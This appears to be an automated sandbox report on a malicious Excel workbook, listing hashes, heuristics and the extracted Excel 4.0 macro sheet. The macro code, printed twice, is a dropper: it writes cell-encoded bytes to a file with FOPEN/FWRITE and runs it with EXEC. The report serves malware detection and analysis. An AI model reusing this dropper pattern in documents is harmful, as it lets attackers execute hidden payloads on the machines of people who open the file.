Office (OOXML) malware analysis — malicious · 6b6863454bd548b3

MALICIOUS

Office (OOXML)

247.6 KB Created: 2021-09-13 09:41:09 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-09-24

MD5: f7f83ae098fe117407f8ccf5f58f966f SHA-1: ac320f995ff2c81d93a63256330f85b29dc09f4d SHA-256: 6b6863454bd548b3b8bec6b6119157e0ae0f711fbebf2ad96f0c765a86f3c6fe

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains Excel 4.0 macros, specifically using functions like FOPEN, FWRITE, FCLOSE, and EXEC. These functions are indicative of a downloader attempting to write and execute a second-stage payload. The macro code attempts to write data to a file path derived from Macro1!$B$793 and then execute it, suggesting a multi-stage attack. The presence of a hidden sheet further supports the concealment of malicious activity.

Heuristics 5

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FOPEN, FWRITE, FCLOSE, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1490 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1490 bytes
SHA-256: `09c5b2737ca8f548bbdb013302ea3225f6b3dee6abc0d2eb5b1c931ff240d202`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A199:B1619"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="199" spans="1:1"><c r="A199" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$401, 1, 200), 1+2)</f><v>0</v></c></row><row r="313" spans="1:1"><c r="A313" t="b"><f>FOR.CELL("wKrNRPTYzCKZk",Sheet1!F163:G13478, TRUE)</f><v>0</v></c></row><row r="401" spans="2:2"/><row r="430" spans="1:1"><c r="A430" t="e"><f>FWRITE(Macro1!A199,CHAR(wKrNRPTYzCKZk))</f><v>#NAME?</v></c></row><row r="490" spans="1:1"><c r="A490" t="b"><f>NEXT()</f><v>0</v></c></row><row r="567" spans="1:1"><c r="A567" t="b"><f>FCLOSE(Macro1!A199)</f><v>0</v></c></row><row r="793" spans="2:2"/><row r="1488" spans="1:1"><c r="A1488" t="b"><f>SET.VALUE(Macro1!$B$793, GET.NOTE(Macro1!$B$793, 1, 200))</f><v>0</v></c></row><row r="1604" spans="1:1"><c r="A1604" t="b"><f>EXEC(Macro1!$B$793)</f><v>0</v></c></row><row r="1619" spans="1:1"><c r="A1619" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="9417" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

SHA-256: 09c5b2737ca8f548bbdb013302ea3225f6b3dee6abc0d2eb5b1c931ff240d202

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A199:B1619"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="199" spans="1:1"><c r="A199" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$401, 1, 200), 1+2)</f><v>0</v></c></row><row r="313" spans="1:1"><c r="A313" t="b"><f>FOR.CELL("wKrNRPTYzCKZk",Sheet1!F163:G13478, TRUE)</f><v>0</v></c></row><row r="401" spans="2:2"/><row r="430" spans="1:1"><c r="A430" t="e"><f>FWRITE(Macro1!A199,CHAR(wKrNRPTYzCKZk))</f><v>#NAME?</v></c></row><row r="490" spans="1:1"><c r="A490" t="b"><f>NEXT()</f><v>0</v></c></row><row r="567" spans="1:1"><c r="A567" t="b"><f>FCLOSE(Macro1!A199)</f><v>0</v></c></row><row r="793" spans="2:2"/><row r="1488" spans="1:1"><c r="A1488" t="b"><f>SET.VALUE(Macro1!$B$793, GET.NOTE(Macro1!$B$793, 1, 200))</f><v>0</v></c></row><row r="1604" spans="1:1"><c r="A1604" t="b"><f>EXEC(Macro1!$B$793)</f><v>0</v></c></row><row r="1619" spans="1:1"><c r="A1619" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="9417" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.